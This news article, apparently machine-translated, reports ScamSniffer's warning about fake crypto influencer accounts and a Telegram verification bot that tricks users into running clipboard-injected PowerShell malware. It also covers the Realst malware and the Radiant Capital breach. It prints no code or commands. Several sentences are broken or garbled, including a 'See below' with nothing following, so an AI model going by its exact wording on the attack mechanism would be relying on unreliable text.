Scam Sniffer warns of fake Influencers and Telegram bots spreading crypto-malware

Bad actors deploy cryptocurrency-stealing malware using a sophisticated combination of fake X accounts and malicious Telegram bots.

Web3 security company ScamSniffer has warned of a new scam targeting cryptocurrency users by imitating popular influencers in the space and emptying their wallets using stealth malware.

The attack begins when scammers create fake X accounts posing as popular cryptocurrency influencers and promoting Telegram groups that promise to offer investment advice. These groups are often presented as “exclusive” and are usually promoted under the posts of influencers that scammers impersonate to make them appear legitimate.

When unsuspecting users join the group via the invite link, they are asked to verify using a Telegram verification bot called “OfficialSafeguardBot” which, according to ScammSniffer, “creates artificial urgency” by giving users users very little time to complete the captcha.

During this fake verification process, the bot injects “malicious PowerShell code”, a scripting language used for automating tasks in Windows, into the victim’s clipboard, and victims are taken to the run on Windows when the robot asks for it as a required step to complete. the verification process. See below.

According to ScamSniffer, there have been “recently numerous cases” where similar tactics were used to steal a user’s private keys. The malware also managed to bypass several antiviruses, with only VirusTotal reporting it as malicious.

To protect themselves, it advises users to use hardware wallets, avoid running unknown commands, and avoid installing unverified software.

The report follows a previous one warning for ScamSniffer about an increase in fake X accounts in December. Notably, identity theft accounts have increased by more than 87% since November, and two victims lost more than $3 million by clicking on malicious links promoted through some of these accounts.

In recent months, threat actors have increasingly used malware designed to drain crypto assets. This rise coincides with Bitcoin’s rally to $100,000 and a broader rise in altcoins, making the crypto sector increasingly lucrative for scammers.

On December 9, Cado Security Labs reported that Realst malware was infiltrating users’ systems using a fake meeting app after tricking them into believing they needed to download the app for a legitimate business opportunity or an interaction with a trusted contact.

Once deployedThe malware steals crypto assets, credentials stored in the browser, bank card details and other sensitive information.

In October, decentralized finance protocol Radiant Capital lost more than $50 million after the systems of some platform developers were compromised via a compressed PDF file containing malware. The attack involved social engineering, with the infected file promoted via Telegram by an attacker posing as a former trusted contractor.